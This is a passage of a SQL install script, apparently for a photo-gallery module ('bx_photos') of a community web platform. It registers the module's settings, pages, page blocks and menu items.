-- SETTINGS SET @iTypeOrder = (SELECT MAX(`order`) FROM `sys_options_types` WHERE `group` = 'modules'); INSERT INTO `sys_options_types`(`group`, `name`, `caption`, `icon`, `order`) VALUES ('modules', 'bx_photos', '_bx_photos', 'bx_photos@modules/boonex/photos/|std-icon.svg', IF(ISNULL(@iTypeOrder), 1, @iTypeOrder + 1)); SET @iTypeId = LAST_INSERT_ID(); INSERT INTO `sys_options_categories` (`type_id`, `name`, `caption`, `order`) VALUES (@iTypeId, 'bx_photos', '_bx_photos', 1); SET @iCategId = LAST_INSERT_ID(); INSERT INTO `sys_options` (`name`, `value`, `category_id`, `caption`, `type`, `check`, `check_error`, `extra`, `order`) VALUES ('bx_photos_summary_chars', '700', @iCategId, '_bx_photos_option_summary_chars', 'digit', '', '', '', 1), ('bx_photos_plain_summary_chars', '240', @iCategId, '_bx_photos_option_plain_summary_chars', 'digit', '', '', '', 2), ('bx_photos_per_page_browse', '12', @iCategId, '_bx_photos_option_per_page_browse', 'digit', '', '', '', 10), ('bx_photos_per_page_profile', '6', @iCategId, '_bx_photos_option_per_page_profile', 'digit', '', '', '', 12), ('bx_photos_per_page_browse_showcase', '32', @iCategId, '_sys_option_per_page_browse_showcase', 'digit', '', '', '', 15), ('bx_photos_rss_num', '10', @iCategId, '_bx_photos_option_rss_num', 'digit', '', '', '', 20), ('bx_photos_searchable_fields', 'title,text', @iCategId, '_bx_photos_option_searchable_fields', 'list', '', '', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:21:"get_searchable_fields";}', 30); -- PAGE: create entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_create_entry', '_bx_photos_page_title_sys_create_entry', '_bx_photos_page_title_create_entry', 'bx_photos', 5, 2147483647, 1, 'create-photo', 'page.php?i=create-photo', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_create_entry', 1, 'bx_photos', '_bx_photos_page_block_title_create_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_create";}', 0, 1, 1); -- PAGE: edit entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_edit_entry', '_bx_photos_page_title_sys_edit_entry', '_bx_photos_page_title_edit_entry', 'bx_photos', 5, 2147483647, 1, 'edit-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_edit_entry', 1, 'bx_photos', '_bx_photos_page_block_title_edit_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_edit";}', 0, 0, 0); -- PAGE: delete entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_delete_entry', '_bx_photos_page_title_sys_delete_entry', '_bx_photos_page_title_delete_entry', 'bx_photos', 5, 2147483647, 1, 'delete-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_delete_entry', 1, 'bx_photos', '_bx_photos_page_block_title_delete_entry', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_delete";}', 0, 0, 0); -- PAGE: view entry INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry', '_bx_photos_page_title_sys_view_entry', '_bx_photos_page_title_view_entry', 'bx_photos', 12, 2147483647, 1, 'view-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_view_entry', 1, 'bx_photos', '', '_bx_photos_page_block_title_entry_photo', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_photo_block";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_text', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:17:"entity_text_block";}', 0, 0, 1, 1), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_author', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_author";}', 0, 0, 1, 3), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_rating', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_rating";}', 0, 0, 0, 0), ('bx_photos_view_entry', 3, 'bx_photos', '_bx_photos_page_block_title_sys_entry_context', '_bx_photos_page_block_title_entry_context', 13, 2147483647, 'service', 'a:2:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"entity_context\";}', 0, 0, 1, 1), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_info', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_info";}', 0, 0, 1, 2), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_location', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_location";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_all_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_all_actions";}', 0, 0, 1, 2), ('bx_photos_view_entry', 4, 'bx_photos', '', '_bx_photos_page_block_title_entry_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"entity_actions";}', 0, 0, 0, 0), ('bx_photos_view_entry', 4, 'bx_photos', '', '_bx_photos_page_block_title_entry_social_sharing', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:21:"entity_social_sharing";}', 0, 0, 0, 0), ('bx_photos_view_entry', 4, 'bx_photos', '', '_bx_photos_page_block_title_entry_attachments', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"entity_attachments";}', 0, 0, 0, 0), ('bx_photos_view_entry', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_comments', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_comments";}', 0, 0, 1, 4), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_entry_location', 3, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:13:"locations_map";s:6:"params";a:2:{i:0;s:9:"bx_photos";i:1;s:4:"{id}";}s:5:"class";s:20:"TemplServiceMetatags";}', 0, 0, 1, 3), ('bx_photos_view_entry', 3, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 0, 1, 4); -- PAGE: view entry "brief" INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry_brief', '_bx_photos_page_title_sys_view_entry_brief', '_bx_photos_page_title_view_entry_brief', 'bx_photos', 2, 2147483647, 1, 'quick-view-photo', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntryBrief', 'modules/boonex/photos/classes/BxPhotosPageEntryBrief.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_view_entry_brief', 1, 'bx_photos', '', '_bx_photos_page_block_title_entry_photo', 0, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:27:"entity_photo_switcher_block";}', 0, 0, 1, 1), ('bx_photos_view_entry_brief', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_info', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:11:"entity_info";}', 0, 0, 1, 1), ('bx_photos_view_entry_brief', 2, 'bx_photos', '', '_bx_photos_page_block_title_entry_author', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"entity_author";}', 0, 0, 1, 2); -- PAGE: view entry comments INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_entry_comments', '_bx_photos_page_title_sys_view_entry_comments', '_bx_photos_page_title_view_entry_comments', 'bx_photos', 5, 2147483647, 1, 'view-photo-comments', '', '', '', '', 0, 1, 0, 'BxPhotosPageEntry', 'modules/boonex/photos/classes/BxPhotosPageEntry.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_view_entry_comments', 1, 'bx_photos', '_bx_photos_page_block_title_entry_comments', '_bx_photos_page_block_title_entry_comments_link', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"entity_comments";}', 0, 0, 1); -- PAGE: popular entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_popular', '_bx_photos_page_title_sys_entries_popular', '_bx_photos_page_title_entries_popular', 'bx_photos', 5, 2147483647, 1, 'photos-popular', 'page.php?i=photos-popular', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_popular', 1, 'bx_photos', '_bx_photos_page_block_title_popular_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:3:{s:9:"unit_view";s:7:"gallery";s:13:"empty_message";b:1;s:13:"ajax_paginate";b:0;}}', 0, 1, 1); -- PAGE: recently updated entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_updated', '_bx_photos_page_title_sys_entries_updated', '_bx_photos_page_title_entries_updated', 'bx_photos', 5, 2147483647, 1, 'photos-updated', 'page.php?i=photos-updated', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_updated', 1, 'bx_photos', '_bx_photos_page_block_title_updated_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_updated";s:6:"params";a:3:{s:9:"unit_view";s:7:"gallery";s:13:"empty_message";b:1;s:13:"ajax_paginate";b:0;}}', 0, 1, 1); -- PAGE: entries of author INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_author', 'photos-author', '_bx_photos_page_title_sys_entries_of_author', '_bx_photos_page_title_entries_of_author', 'bx_photos', 5, 2147483647, 1, '', '', '', '', 0, 1, 0, 'BxPhotosPageAuthor', 'modules/boonex/photos/classes/BxPhotosPageAuthor.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_author', 1, 'bx_photos', '', '_bx_photos_page_block_title_entries_actions', 13, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:18:"my_entries_actions";}', 0, 0, 1, 1), ('bx_photos_author', 1, 'bx_photos', '_bx_photos_page_block_title_sys_favorites_of_author', '_bx_photos_page_block_title_favorites_of_author', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_favorite";s:6:"params";a:1:{i:0;s:12:"{profile_id}";}}', 0, 1, 1, 2), ('bx_photos_author', 1, 'bx_photos', '_bx_photos_page_block_title_sys_entries_of_author', '_bx_photos_page_block_title_entries_of_author', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_author";}', 0, 0, 1, 3); -- PAGE: entries in context INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_context', 'photos-context', '_bx_photos_page_title_sys_entries_in_context', '_bx_photos_page_title_entries_in_context', 'bx_photos', 5, 2147483647, 1, '', '', '', '', 0, 1, 0, 'BxPhotosPageAuthor', 'modules/boonex/photos/classes/BxPhotosPageAuthor.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_context', 1, 'bx_photos', '_bx_photos_page_block_title_sys_entries_in_context', '_bx_photos_page_block_title_entries_in_context', 11, 2147483647, 'service', 'a:2:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"browse_context\";}', 0, 0, 1, 1); -- PAGE: module home INSERT INTO `sys_objects_page`(`object`, `uri`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_home', 'photos-home', '_bx_photos_page_title_sys_home', '_bx_photos_page_title_home', 'bx_photos', 2, 2147483647, 1, 'page.php?i=photos-home', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_home', 1, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 1, 1, 0), ('bx_photos_home', 1, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:7:"gallery";}}', 0, 1, 1, 1), ('bx_photos_home', 2, 'bx_photos', '', '_bx_photos_page_block_title_popular_keywords', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:14:"keywords_cloud";s:6:"params";a:2:{i:0;s:9:"bx_photos";i:1;s:9:"bx_photos";}s:5:"class";s:20:"TemplServiceMetatags";}', 0, 1, 1, 0), ('bx_photos_home', 2, 'bx_photos', '', '_bx_photos_page_block_title_cats', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:15:"categories_list";s:6:"params";a:2:{i:0;s:14:"bx_photos_cats";i:1;a:1:{s:10:"show_empty";b:1;}}s:5:"class";s:20:"TemplServiceCategory";}', 0, 1, 1, 1); -- PAGE: search for entries INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_search', '_bx_photos_page_title_sys_entries_search', '_bx_photos_page_title_entries_search', 'bx_photos', 5, 2147483647, 1, 'photos-search', 'page.php?i=photos-search', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_form', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:8:"get_form";s:6:"params";a:1:{i:0;a:1:{s:6:"object";s:9:"bx_photos";}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 1, 1), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_results', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:11:"get_results";s:6:"params";a:1:{i:0;a:2:{s:6:"object";s:9:"bx_photos";s:10:"show_empty";b:1;}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 1, 2), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_form_cmts', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:8:"get_form";s:6:"params";a:1:{i:0;a:1:{s:6:"object";s:14:"bx_photos_cmts";}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 0, 3), ('bx_photos_search', 1, 'bx_photos', '_bx_photos_page_block_title_search_results_cmts', 11, 2147483647, 'service', 'a:4:{s:6:"module";s:6:"system";s:6:"method";s:11:"get_results";s:6:"params";a:1:{i:0;a:2:{s:6:"object";s:14:"bx_photos_cmts";s:10:"show_empty";b:1;}}s:5:"class";s:27:"TemplSearchExtendedServices";}', 0, 1, 0, 4); -- PAGE: module manage own INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_manage', '_bx_photos_page_title_sys_manage', '_bx_photos_page_title_manage', 'bx_photos', 5, 2147483647, 1, 'photos-manage', 'page.php?i=photos-manage', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_manage', 1, 'bx_photos', '_bx_photos_page_block_title_system_manage', '_bx_photos_page_block_title_manage', 11, 2147483647, 'service', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:12:"manage_tools";}}', 0, 1, 0); -- PAGE: module manage all INSERT INTO `sys_objects_page`(`object`, `title_system`, `title`, `module`, `layout_id`, `visible_for_levels`, `visible_for_levels_editable`, `uri`, `url`, `meta_description`, `meta_keywords`, `meta_robots`, `cache_lifetime`, `cache_editable`, `deletable`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_administration', '_bx_photos_page_title_sys_manage_administration', '_bx_photos_page_title_manage', 'bx_photos', 5, 192, 1, 'photos-administration', 'page.php?i=photos-administration', '', '', '', 0, 1, 0, 'BxPhotosPageBrowse', 'modules/boonex/photos/classes/BxPhotosPageBrowse.php'); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('bx_photos_administration', 1, 'bx_photos', '_bx_photos_page_block_title_system_manage_administration', '_bx_photos_page_block_title_manage', 11, 192, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:12:"manage_tools";s:6:"params";a:1:{i:0;s:14:"administration";}}', 0, 1, 0); -- PAGE: add block to homepage SET @iBlockOrder = (SELECT `order` FROM `sys_pages_blocks` WHERE `object` = 'sys_home' AND `cell_id` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `active`, `order`) VALUES ('sys_home', 1, 'bx_photos', '_bx_photos_page_block_title_recent_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:2:{i:0;b:0;i:1;b:0;}}', 1, 0, 0, IFNULL(@iBlockOrder, 0) + 1); -- PAGES: add page block to profiles modules (trigger* page objects are processed separately upon modules enable/disable) SET @iPBCellProfile = 3; INSERT INTO `sys_pages_blocks` (`object`, `cell_id`, `module`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('trigger_page_profile_view_entry', @iPBCellProfile, 'bx_photos', '_bx_photos_page_block_title_my_entries', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_author";s:6:"params";a:2:{i:0;s:12:"{profile_id}";i:1;a:2:{s:8:"per_page";s:26:"bx_photos_per_page_profile";s:13:"empty_message";b:0;}}}', 0, 0, 0); -- PAGE: service blocks SET @iBlockOrder = (SELECT `order` FROM `sys_pages_blocks` WHERE `object` = '' AND `cell_id` = 0 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_pages_blocks`(`object`, `cell_id`, `module`, `title_system`, `title`, `designbox_id`, `visible_for_levels`, `type`, `content`, `deletable`, `copyable`, `order`) VALUES ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 1), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_recent_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:13:"browse_public";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 2), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_popular_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 3), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_popular_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:14:"browse_popular";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 4), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries_view_extended', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:8:"extended";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 5), ('', 0, 'bx_photos', '', '_bx_photos_page_block_title_featured_entries_view_full', 11, 2147483647, 'service', 'a:3:{s:6:"module";s:9:"bx_photos";s:6:"method";s:15:"browse_featured";s:6:"params";a:1:{i:0;s:4:"full";}}', 0, 1, IFNULL(@iBlockOrder, 0) + 6), ('', 0, 'bx_photos', '_bx_photos_page_block_title_sys_recent_entries_view_showcase', '_bx_photos_page_block_title_recent_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:13:\"browse_public\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 7), ('', 0, 'bx_photos', '_bx_photos_page_block_title_sys_popular_entries_view_showcase', '_bx_photos_page_block_title_popular_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:14:\"browse_popular\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 8), ('', 0, 'bx_photos', '_bx_photos_page_block_title_sys_featured_entries_view_showcase', '_bx_photos_page_block_title_featured_entries_view_showcase', 11, 2147483647, 'service', 'a:3:{s:6:\"module\";s:9:\"bx_photos\";s:6:\"method\";s:15:\"browse_featured\";s:6:\"params\";a:3:{s:9:\"unit_view\";s:8:\"showcase\";s:13:\"empty_message\";b:0;s:13:\"ajax_paginate\";b:0;}}', 0, 1, IFNULL(@iBlockOrder, 0) + 9); -- MENU: add to site menu SET @iSiteMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_site' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_site', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_home', '_bx_photos_menu_item_title_entries_home', 'page.php?i=photos-home', '', '', 'camera-retro col-blue1', 'bx_photos_submenu', 2147483647, 1, 1, IFNULL(@iSiteMenuOrder, 0) + 1); -- MENU: add to homepage menu SET @iHomepageMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_homepage' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_homepage', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_home', '_bx_photos_menu_item_title_entries_home', 'page.php?i=photos-home', '', '', 'camera-retro col-blue1', 'bx_photos_submenu', 2147483647, 1, 1, IFNULL(@iHomepageMenuOrder, 0) + 1); -- MENU: add to "add content" menu SET @iAddMenuOrder = (SELECT `order` FROM `sys_menu_items` WHERE `set_name` = 'sys_add_content_links' AND `active` = 1 ORDER BY `order` DESC LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_add_content_links', 'bx_photos', 'create-photo', '_bx_photos_menu_item_title_system_create_entry', '_bx_photos_menu_item_title_create_entry', 'page.php?i=create-photo', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 1, IFNULL(@iAddMenuOrder, 0) + 1); -- MENU: actions menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view', '_bx_photos_menu_title_view_entry', 'bx_photos_view', 'bx_photos', 9, 0, 1, 'BxPhotosMenuView', 'modules/boonex/photos/classes/BxPhotosMenuView.php'); INSERT INTO 